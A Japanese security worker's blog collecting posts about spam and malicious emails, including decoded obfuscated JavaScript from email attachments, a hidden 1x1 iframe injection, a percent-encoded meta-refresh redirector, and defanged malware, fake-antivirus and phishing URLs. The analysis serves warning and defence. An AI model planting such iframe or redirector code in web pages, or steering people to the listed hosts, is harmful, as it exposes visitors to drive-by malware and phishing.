スポンサーサイト

上記の広告は1ヶ月以上更新のないブログに表示されています。
新しい記事を書く事で広告が消せます。

【SPAM対策】慣れと熟れ

ふと、思いついたのだが。

どらのプライベートメールには山のようにSPAMメールが届く。SPAMフィルターを入れてないからだ。秀逸なものも多いが、あまりにも沢山来るので、こんなものに引っかかる人はいないのだろうなと、思っていた。

会社ではSPAMフィルターが入っていないので、SPAMが到達することはほとんどない。

もちろんたまに見かけるが、普段からプライベートメールでSPAMのゴミ攻撃に慣れているので、ねずみ取りをしている道路を走っている時に機能するシックスセンスが、たちどころに働きSPAMを仕分けてしまうのだ。

そういうことか。

SPAMフィルターは、SPAMから身を守る為にあるのではなく単なる生産性を向上させるためにあるものなんだと。

普段から、SPAMに接して熟れていると大丈夫さがアップするのだが、SPAMが無い世界に慣れていると、だまされる確率もあがるということか。

うちの会社の若手が言っていたが、「生活技術力」の向上がキーと言うことなんだろう。
スポンサーサイト

【玉虫の告知文】ビックカメラドットコム再開のお知らせ

先日、ID、パスワードの不正使用が発覚して停止していた、ビックカメラのインターネットショッピングサイト「ビックカメラドットコム」が再開するようだ

原因の記載がないのでよくわからないけど、「第三者機関によるセキュリティ診断により当社ドットコムの安全性を確認するに至りましたので、近日中にサイトを再開」とあるので、外部からの不正侵入でIDやパスワードが窃取され不正使用されたということなんだろうと、想像してしまう。

1.もし、想像通り外部からの不正アクセスが原因ならば、何故そう書かないのだろうか?(実害が出てないので騒ぎを大きくしたくないのか?捜査機関への協力なのか?普通、後者はないなぁ。)

2.どらは会員じゃないので分からないが、ユーザIDには何を使用しているのだろうか?登録時の本人確認はどうしているのだろうか?また、どんなデータを登録しておくのだろうか?

1)ビックカメラのカード番号
2)メールアドレス
3)この差異が振り出した適当なコード
4)利用者が指名した適当なコード

一般的には、第三者のサイトで漏えいしたユーザIDとパスワードが不正に使用されることも多いと思うが、この告知文を読むとそうでなさそうだ。

そうすると、何かが漏えいしたか、ユーザIDの生成に問題があったのどちらかのように思えるが、どちらにしても大きな問題のようだが。

何かが漏えいした場合、個人情報等は含まれてなかったのか?

ユーザIDの生成に問題があった場合(例えば、カード番号がIDとなる場合、未登録で有効なカード番号を当てることが出来れば、人のカードで勝手になり済まし登録が可能など。)は、サイトに既に登録済み利用者の正当性確認、若しくは未登録の利用者への考慮はどうなっているのだろうか?

今後の、情報開示をみていきたいが、このまま終わる気もする。(笑)

21:13 加筆
ユーザIDは登録時に任意らしい。

すると、、、やっぱり他のサイトでの流出影響???
でも、適当に登録後、カード番号登録や変更などでのビンゴの可能性もまだ否定はできないか。。。うむ。

【今日の難読スクリプト】本当によく考える

件名
resume

本文
You must enable JavaScript to see this text.

添付ファイル
32027resume.html

中身 こういう感じのスクリプトが、、
var s="ほにゃらかuuq;00uigsjjtkfotfo/el0jgsbnfgjmf/ktほにゃらか";
m=""; for (i=0; i<s.length; i++) m+=String.fromCharCode(s.charCodeAt(i)-1); document.write(m);
→ s.charCodeAt(i)-1 なのでひとつ前に戻すと。要はHAL→IBMですね。
h丁丁p://thfriisjensen.dk/iframefile.js となります。

で、落ちてくるのがこれ。
document.write("<iframe src='h丁丁p://wiqosah.co.cc/images/?str=get&cat=168&pool=undo&refresh=img&action=boz&app=param' width='1' height='1' style='visibility: hidden;'></iframe>");

要は、iframneタグで誘導ですね。

で、誘導先
h丁丁p://wiqosah.co.cc/images/?str=get&cat=168&pool=undo&refresh=img&action=boz&app=param

は、どうもwiqosah.co.ccが名前解決できない。誰か止めたのでしょう。

それにしても最近よ奴は
1.ISPのスパムフィルタをくぐることが多い
2.ISPのアンチウイルスGWをくぐりぬける。

変化早いね。添付するコードと文面パターンなどの自動ジェネレータなんかで作ってやっているような感じだな。

【狙いは?】やたらとくるhelloメール

昨日からやたらとくる
件名
hello
本文
how are you?
の迷惑メール。会社のフィルタリングも通りぬける。フィルタで判断しづらいメールなんだろうな。

目的は何だろうか?
1.アドレスの有効性確認? これは、ないだろうなぁ。
2.迷惑メールフィルタにホワイトリスト登録をさせようとしている?そんなことできるのだろうか?
3.目くらまし? 次に似たメールで本物を送ってくる?
4.単にリプライしてくる人を探している? やっぱりこれかな?いるのかなそんな人。

ちなみに送信元を調べてみた。傾向はあるなぁ、やっぱり。
180.215.220.2 IN: India (インド )
93.85.213.98  BY: Belarus (ベラルーシ共和国) 
2.89.119.8 SA: Saudi Arabia (サウジアラビア王国) 
89.204.106.69  RU: Russian Federation (ロシア連邦) 
93.85.169.191 BY: Belarus (ベラルーシ共和国) 
95.132.101.230 UA: Ukraine (ウクライナ ) 
92.112.48.122 UA: Ukraine (ウクライナ ) 
122.177.159.54 IN: India (インド ) 
117.254.28.110 IN: India (インド ) 
91.189.156.1 UA: Ukraine (ウクライナ ) 
195.78.60.50  RU: Russian Federation (ロシア連邦) 
59.177.112.189  IN: India (インド ) 
80.73.6.159  UA: Ukraine (ウクライナ ) 
188.133.168.110 RU: Russian Federation (ロシア連邦) 
178.94.71.169 UA: Ukraine (ウクライナ ) 
92.112.146.184  UA: Ukraine (ウクライナ ) 
178.125.50.3 BY: Belarus (ベラルーシ共和国) 
83.131.85.97  HR: Croatia/Hrvatska (クロアチア共和国) 
187.113.220.112  BR: Brazil (ブラジル連邦共和国) 
178.206.0.79 RU: Russian Federation (ロシア連邦) 
117.198.193.96  IN: India (インド ) 
188.116.209.205 BH: Bahrain (バーレーン王国) 
190.94.15.227 DO: Dominican Republic (ドミニカ共和国) 
123.19.47.60 VN: Vietnam (ベトナム社会主義共和国) 
109.92.87.135 RS: Republic of Serbia (セルビア共和国) 
78.36.203.97 RU: Russian Federation (ロシア連邦) 
178.123.43.62 BY: Belarus (ベラルーシ共和国) 
94.180.168.102 RU: Russian Federation (ロシア連邦) 
91.124.113.186 UA: Ukraine (ウクライナ ) 
84.228.79.146  IL: Israel (イスラエル国) 
94.59.136.58 AE: United Arab Emirates (アラブ首長国連邦) 
201.1.4.161 BR: Brazil (ブラジル連邦共和国) 
89.142.196.42 SI: Slovenia (スロベニア共和国) 
178.150.227.232 UA: Ukraine (ウクライナ ) 
109.95.35.6 UA: Ukraine (ウクライナ ) 
83.99.152.67 LV: Latvia (ラトビア共和国) 
220.136.84.215 TW: Taiwan (台湾) 

【今日の誘導メール】放置プレイはいかん。

件名
Twitter 02-95 info

本文
Hi, infoYou have 7 unreaded message(s) from Twitter.
Click this link:http://twitter.com/account/confirm_email/info/6E05E-05E21-886311Once you confirm, all future email from Twitter will be sent to this address. The Twitter Team If you received this message in error and did not sign up for a Twitter account, click not my account. Please do not reply to this message; it was sent from an unmonitored email address. This message is a service email related to your use of Twitter. For general inquiries or to request support with your Twitter account, please visit us at Twitter Support.
twitter.jpg

誘導先 → h丁丁p://twinkle.twinstar.jp/zujysajm.html
メタタグ誘導先 → h丁丁p://biopharmacytech.com → 存在せず。

で、この http://twinkle.twinstar.jp/ が 以下。phpで作られている。まぁ、踏み台だな。日本のサイトも踏み台になりそうだなとは思っていたけど。放置プレイはいかんな。
modx.jpg

ちなみに、http://www.twinstar.jp/ にアクセスすると http://stepserver.jp/に飛ばされる。

step.jpg

続きを読む

【今日の誘導メール】

件名
Resume

本文
Attached, please find

添付ファイル
Resume.html

誘導先
難読化したメタタグ → h丁丁p://wimbert.nl/x.html

この中身
メタタグ → h丁丁p://brocuphdislock.cz.cc/scanner10/?afid=24
→ ウイルススキャンしているようなムービーが表示される
iframeタグ → h丁丁p://highplace.in/stat/?up=image&page=151&done=disabled&account=ecard&next=param
→ ここで何かやってる感じ

【今日の悪質スクリプト】

件名
Good music

本文
It has a beat, you can dance to it ・I壇 give it an eight.

<<Second chord sounds in world's longest lasting concert - Yahoo! News>>


************************************************************************
This e-mail and any of its attachments may contain Exelon Corporation
proprietary information, which is privileged, confidential, or subject
to copyright belonging to the Exelon Corporation family of Companies.
This e-mail is intended solely for the use of the individual or entity
to which it is addressed. If you are not the intended recipient of this
e-mail, you are hereby notified that any dissemination, distribution,
copying, or action taken in relation to the contents of and attachments
to this e-mail is strictly prohibited and may be unlawful. If you have
received this e-mail in error, please notify the sender immediately and
permanently delete the original and any copy of this e-mail and any
printout. Thank You.
************************************************************************

添付ファイル
Second chord sounds in world's longest lasting concert - Yahoo! News.html

中身
メタタグ → h丁丁p://acquaintive.in/x.html

その中身
メタタグ → h丁丁p://rametcori.cz.cc/scanner15/?afid=24
iframeタグ → h丁丁p://jackgas.ru:8080/index.php?pid=10

.ru:8080/index.php?pid=10 の中身
難読化されたスクリプト

【どらのところに来てもなぁ】フィッシング

差出人
"Bank of America Military Bank" <accountssupport@militarybankonline.bankofamerica.com>

サブジェクト
account update

本文
Dear Bank of America Military Bank customer:This letter is to inform you that there is an update required for your Bank of America Military Bank Account, for this reason your account has been flagged.In order to update your account, please follow this link.Thank you for banking with us!Bank of America Military Bank accounts support.

フィッシングサイト
h丁丁p://bankofamericamilitarybankonline.com/efs/servlet/military/login.asp
bankame.jpgwidth="560" height="505" />

【今日の誘導メール】アマゾン系

最近のアマゾンを装った誘導メール。

サブジェクトが Your Order with Amazon.com で HTMLでアマゾンのオーダフォーム見たいのが付いているやつ。
amazon2.jpg

以下が誘導先。どらは、これ見て気付かなかった。orz
h丁丁p://migre.me/13rol
h丁丁p://migre.me/13rtT
h丁丁p://migre.me/13r0n
h丁丁p://migre.me/13qZq
h丁丁p://migre.me/13s2b
h丁丁p://migre.me/13rre
h丁丁p://migre.me/13rQi
h丁丁p://migre.me/13rpa
h丁丁p://migre.me/13qQl
h丁丁p://snipr.com/10fl8o
h丁丁p://snipr.com/10fmhb
h丁丁p://snipr.com/10fm4m
h丁丁p://snipr.com/10fkei
h丁丁p://snipr.com/10fjxf
h丁丁p://snipr.com/10fk38
h丁丁p://snipurl.com/10fkel
h丁丁p://snipurl.com/10flus
h丁丁p://snipurl.com/10fjpg
h丁丁p://snipurl.com/10fjpq
h丁丁p://snipurl.com/10fmq4
h丁丁p://miturl.com/ifhz

それぞれのサイトを表示すると、、、、

何だ!URL圧縮サービスじゃないか!orz。

migreme.jpg

sniprcom.jpg

snipurlcom.jpg

miturlcom.jpg

【今日の誘導メール】アマゾン系

サブジェクト
Your Order with Amazon.com

本文
長いので面倒

誘導先
h丁丁p://migre.me/13qQl
さらにそこからiframeで誘導
h丁丁p://baymediagroup.com:8080/?pid=14

【今日の誘導メール】実態は同じか

サブジェクト
Thank you for your EXPRESS payment

本文
Thank you for your EXPRESS payment
***PLEASE DO NOT REPLY TO THIS MESSAGE***
Dear ○○@○○.com,

Thank you for your online payment of $500.00.Your payment will be applied on Fri, 6 Aug 2010 18:32:48 +0300

Remember you can manage your account online, view statements and payyour bill at www.mycardcare.com/express.

誘導先
→ h丁丁p://opus22.org/x.html

→誘導先1
h丁丁p://hoopdotami.cz.cc/scanner5/?afid=24 ↓ aguse.jpによる画面 偽物ソフトの動画と思われる。
hoopdotamiczcc.jpg
→誘導先2 ↓ こちらが本体か?
h丁丁p://yummyeyes.ru:8080/index.php?pid=10

【今日の悪質スクリプト】

# このページは、ウイルス対策ソフトが反応する可能性がありますが、表示するだけで実害があるものはありません。

差出人(複数メール)
"Beulah Oliver" <libidosqs@rightsideadvisors.com>
"German Hurt" <earltr48@renaultcarclub.com>
"Carmen Ham" <endingspg09@richardsapex.com
"Ruby Short" <larksv2@roybakermotors.com>
"Myron Vernon" <initialledgq96@rockfour.com>

サブジェクト(複数メール)
Give her a taste of your giant
Maddona's private party
Anuual wholesale
15 seconds enough to be ready
Beat up the crysis

本文(代表的なメール)
Powerful growth formula.

Forwarded Message Attached

添付HTML
blog_post_080610.htm
中身
document.write(unescape('%20%20%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%72%65%66%72%65%73%68%22%20%63%6F%6E%74%65%6E%74%3D%22%30%3B%75%72%6C%3D%68%74%74%70%3A%2F%2F%73%68%61%6D%65%6C%65%73%73%66%72%65%65%67%69%66%74%2E%63%6F%6D%2F%78%2E%68%74%6D%6C%22%3E'));
→ 難読化の解除(誘導先)
h丁丁p://shamelessfreegift.com/x.html
→誘導先1
h丁丁p://hoopdotami.cz.cc/scanner5/?afid=24 ↓ aguse.jpによる画面 偽物ソフトの動画と思われる。
hoopdotamiczcc.jpg
→誘導先2 ↓ こちらが本体か?
h丁丁p://yummyeyes.ru:8080/index.php?pid=10
プロフィール

どらいつ 家主:どらいつ

情報セキュリティ会社勤務。13年前からタバコを止めたが禁煙はしてない。ダイエットとリバウンドの繰り返し。


1958年 北九州市生まれ。大原小学校、池田小学校、香月中学、北九州予備校、東筑高校、熊本大学土木科(中退)、1984年就職、現在にいたる。

中学時は水泳部。部内で平泳ぎ 4位(4人中)。高校・大学時代9年間はラグビー。ポジションはフッカー。当時に今の体重があれば、、

ツイッター(Twitter) dry2
つぶやきログ(Twilog) dry2
日経電子版コラム
日経BP連載
グーグル+写真アルバム
フォト蔵 dry2

最新記事
最新コメント
カテゴリ
RSS
どらいつのお気に入り
上記広告は1ヶ月以上更新のないブログに表示されています。新しい記事を書くことで広告を消せます。